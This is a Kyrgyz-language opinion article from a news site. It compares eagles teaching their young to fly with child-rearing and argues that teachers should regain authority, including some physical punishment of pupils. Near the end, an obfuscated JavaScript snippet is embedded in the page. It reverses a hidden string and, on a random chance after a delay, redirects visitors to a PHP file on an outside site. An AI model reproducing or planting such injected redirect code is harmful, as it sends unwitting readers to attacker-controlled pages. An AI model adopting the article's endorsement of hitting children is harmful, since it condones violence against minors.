УЧКАНДА ЭМНЕ БОЛОРУН ОЙЛОБОГОН – УЯДАГЫ “ТАРБИЯ”

25-февраль, 2022-ж. / Редакция / Жаңылыктар 47

Ар бир ата-эне балам бүркүттөй кыраан, чыдамкай, камкор, ал эми кызым ак куудай назик, ыймандуу болсо деп тилейт. Бирок ошол бүркүттүн балапанын учканга жана тамагын таап жегенге үйрөткөнү адамдар үчүн да табылгыс сабак. Бүркүт адегенде бак-дарактын бутактарынан, чырпыктарынан алып келип, анан эркеги да, ургаачысы да өздөрүнүн жүндөрүнөн жулуп төшөп уясын аябай мамыктап, жумшактап салат. Анткени, жумурткадан жаңы чыккан балапандары жүнү жок болот. Балапандарынын жүнү чыгып, темир канат болуп барпайып калганда эркек бүркүт канатын каккылап уядагы жумшак жүндүн баарын учуруп, учпай калгандарын тумшугу менен бирден терип алып салат. Бул балапан тарбиялоонун эң алгачкы кадамы. Андан соң алып келген олжосун уянын жанына, балапандарына көрүнөө жерге келип жейт. Аны көргөн балапандары баягы мамыктай болгон жумшак уя жок катуу жыгачтын үстүндө жаткандары аз келгенсип, эми курсагы ачса да ата-энеси тамак бербей өздөрү жеп жатканына чырылдап, уянын кырына келишет. Талпынып жатып тик ылдый кулайт. Артынан ата бүркүт шукшурулуп кирип, жерге жеткирбей жонуна тосуп алып, кайра баягы ыңгайсыз уяга алып келип таштайт. Ошентип, улам бири түшкөн сайын алып келип уяга таштай берет. Аргасыздан темир канаттарын каккылаган балапандар         учууга көнүгө баштайт. Дал ушундай ыкма менен бүркүттөр балапандарына учканды үйрөтөт.

Ал эми биз, адамдар, балдарга тарбия берүүдө, өзгөчө акыркы 30 жылда өтө жосунсуз жоруктарга жол берип, балдарыбыздын тескери кадамын көрсөк да көрмөксөн, билсек да билмексен болуудабыз. “Элүү жылда эл жаңы, жүз жылда жер жаңы” – дейт кыргыз элинде. Эртеңки коомду биздин бүгүнкү балдар түзөрүн ойлосок, анда балдарды мындай шалаакы тарбияга калтырып, татаал тагдырга дуушар кылбасак жакшы болор эле. Биз бала кезде ата-энебиз кулагыбызга куюп, кыттай уюп калган: “Улуу киши жумшаганда чурка, улууларга акаарат келтирбе, сага өнөр үйрөтүп жаткан устатыңдын айтканын кынтыксыз аткар, мугалимдерге эч качан каяша айтпа” ж.б. ушул өңдүү тарбияны азыр балдарыбызга бере албай жатканыбыз өкүнүчтүү…

Мектеп партасынан баштап эле кесип тандоого багытталган “Ар бир кесип ардактуу” деген сабактан негедир класстын жарымы мугалим болууга дилгирленип турса, бир тобу дарыгер болууну каалап, айрымдары дагы башка кесиптерди тандаар эле. Мугалим болгубуз келчү. Анткени, мугалимдеги билим, мугалимдеги мээрим, андагы кыраакылык менен даанышмандык бизди кудум арбап алгандай. Кесиптер тууралуу дил баян жаза турган болсок, алгач эле “Мугалим – мөмөлүү дарак” – деп баштаар элек. Азыркы ар бир кесиптин ээси ошол тамырын терең жайган дарактын мөмөсү экендигин эч ким тана албайт. Ар бир инсандын мугалими бар. Президентти да, министрди да, космоско учкан космонавтты да мугалим окуткан. Андай болсо бүгүнкү ошол “мөмөлөр” өз тамырына каршы чыгып жатканы кандай?.. (азыркы окуучулардын ата-энелери да өз мугалимдеринин мөмөсү эмей эмне?)

Айтайын дегеним, укук, укук деп жатып жоопкерчилик дегенди унутуп калдык окшойт. Азыркы күндө мугалим менен окуучунун ортосундагы мамиле өтө чоң талкууда. Коомдогу кээ бир адамдар мугалимдин укугун коргоп чыкса, бир тобу окуучунун укугу деп жер тээп жатышат. Окуучуну окутуучудан же окутуучуну окуучудан коргоо керек деген сандырак ойго чейин жеткен абалыбызга сөз жок. Бул эки тараптын ортосунда бири-бирине болгон ишеним, бир максатка чогуу умтулуу болбосо билим берүү тармагында эч кандай алга жылуу болбойт. Мугалимдерди деле талаадан алып келип эле жумушка ала койбосун эске алышыбыз керек. Ар бир окуу жылынын башында ден соолугун толук текшерүүдөн өткөрүп, ал гана эмес, психикалык жактан да текшерилип анан сабак берүүгө укук алышат. Ал эми билим деңгээли боюнча даярдыктарын өзүнчө сөз кылууга арзыйт.

Билим алууда болобу, спортто болобу же жөн эле багбанчылыкта болобу, ийгилик жаратуу үчүн кандайдыр бир деңгээлде курмандык керек эмеспи, анын  сыңарындай, балага билим берүүдө да кандайдыр бир тыюулар же чектөөлөр, катуураак коюлган талаптар абдан зарыл. Мисалы, кээ бир балдар жалкоо болот, кээ бири ашынган тентек, кээ бири өтө жоош, кээ бири окууга көңүлү жок, деги ар кандай болот. Кээ бир бала урушмайынча токтолбойт, айрымдары акырын айтканда эле түшүнөт. Ушул өңдүү ар кандай мүнөздөгү 30-40 бала менен бир убакта иштеп жаткан мугалим тууралуу ойлонуп көрдүңүз беле? Пандемия учурунда онлайн окуган кезде ким баласын урушкан жок? Ким баласын урган жок же такыр кыйкырган жок? Бир баласы болсо да эч нерсе эмес, беш-алты балалуулар айласын таппай калган учурларды көрдүк го… Дыйкандар деле бир күнү картөшкөсүн айдаса, башка күнү пияз, анын эртеси жүгөрүнү айдайт эмеспи. Бир убакта 30-40ты билимге сугарып, алардын ата-энеси менен иш алып барып, кайра жетекчиликке отчёт берип жан үрөп иштеген мугалим гана болушу керек. Бак деле жакшы жемиш бериш үчүн аны жаз алды менен бутайт, керексиз майда бутактарды балта менен кескендей эле мыкты окуучуну оюнкараак болуп сабакты түшүнбөй, жалкоолонуп тапшырмасын аткарбай жатып балдардан артта калбашы үчүн анча-мынча “какыс-кукус” кылуунун эч зыяны болбойт. Тээ илгери баланы окууга бергенде сөөгү меники, эти сиздики деп мугалимге тапшырып кетишчү эмес беле ата-энелер. Жаш өзгөчөлүгүнө карабай мугалимге “Сиз” деп сылык кайрылып, айткан талаптарын мыйзам катары көрүшчү. Ошол биз окуучу кезде мугалим чаап коймок тургай сабаса да эми үйдөгүлөр укпаса экен деп зырылдап турар элек. Айрым ашынган тентектигибиз үчүн мугалимден таяк жегенибиз кокустан үйгө угулуп калса, мугалимдин үстүнөн арызданмак түгүл ата-энебиз элден уялып: “Ошону көрмөксүң, сага чала болот, дагы катуураак сабаса болмок экен, эмне үчүн мугалимдин айтканын укпайсың?” – деп кайра эки эсе уруш угуп, калган токмокту үйдөн жечүбүз. Ушундай болорун алдын ала билгенден кийин мугалимдердин таяк менен берген тарбиясын башты шылкыйтып туура кабыл алууга аргасыз болчубуз. Ушундай тарбияда чоңойгон балдардын кийин 10 жылдык, 20 жылдыкка барганда окуткан мугалимдерине ыраазы болуп, сиздин таягыңыз мени адам кылды дегендерин көп эле эшиттим. Эми ал убакыттар өтүп, бир топ мезгил алмашты. Учурда андай деле жыга чаап, башын жарып салган мугалимдер кездешпейт. Ошентсе да баласынын тартибине кайдыгер карап же  өздөрү үйдөн татыктуу тарбия бербей, ал аз келгенсип мектептен тарбиялоого тоскоол болгон ата-энелер көбөйдү. Артты кылчайып карасак, катаал мүнөздөгү мугалимдин сабагын калтырбай жакшы окуп, андан корккондон болсо да түз жүргөн учурлар эске түшөт, жаман болдукпу, адам кылып тарбиялап,  таалимин аябаган андай мугалимдер азыр коомубузга өтө керек. Тартип болмоюнча билим алууга мүмкүн эмес. Ата-эне менен мугалим бир тарапта турмайынча билимдүү, тартиптүү бала тарбияланышы күмөн. Энеси болушчаактын баласы ыйлаак дегендей, болушчаактардын баласы кандай тагдырга туш болуп жатканын көрүп деле сабак алышыбыз керек го. Же эмне, сөзсүз өз башыбызга келмейин, бармакты кырча тиштемейин эсибизге келбейбизби?.. Тилекке каршы, беш манжаңды бүт тиштесең да ал кезде кеч болуп калары турган иш. “Агаңа каяша айтканың, атаңа каяша айтканың, эжеңе каяша айтканың, энеңе каяша айтканың” дегендей, бүгүн мугалимге каяша айткан окуучу эртеңки күнү ата-энесине каяша айтпайт деп ким кепилдик бере алат? Бирок ошол мугалимге да, ата-энеге да каяша айткан окуучу тагдырында жолуккан оор күндөргө каяша айталбай жеңилип каларын терең ойлонсок болор беле?

Мен деле окуучуга зомбулук менен мамиле кылып, башын жара чаап же кызылдай сабап окутканга каршымын, окуучуну басмырлап, шылдыңдоого жол берүүгө болбойт, бирок тартип-тарбияны жакшыртуу максатында чектен ашкан жерден мугалимге да балдарды “тарбиялап коюуга” укук берүүгө эмнеге болбосун? Талапты катуу койгон мугалимдин  келечекте балабыздын бизди гана эмес, мамлекетибизди бага турган инсан кылып тарбиялоосуна жолтоо болбой эле койсок утканыбыз ошол болор эле… Болбосо баланы окууга кабыл алып жатканда мугалим менен ата-эне жана баланын ортосунда үч тараптуу келишим түзүлүп, ага кол коюлуп, кагаз толтуруп койсок да болот. Мына ошондо кандай гана жагдай болбосун ошол келишимдин негизинде иш алып баруу оңой болмок. Мындай ыкма да айла кеткендеги иш экени жалганбы? Болбосо ишеним менен эле баласын мектепке алып келип, ишенип тапшырган баланы ишенимди актоо максатында окутуп, мамлекетке салым кошсок, балким, биз эңсеген коомду түптөй алат белек деген ойго жетеленесиң!..

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/25_02_organized.pdf»>2022-жылдын 25-февралы

Кутмырза Жакыбалиев,
КР Президентине караштуу
Мамлекеттик тил жана тил саясаты боюнча
улуттук комиссиянын маалымат катчысы

25-февраль, 2022-ж. / Редакция / Жаңылыктар 47
Бөлүшүү: Telegram WhatsApp X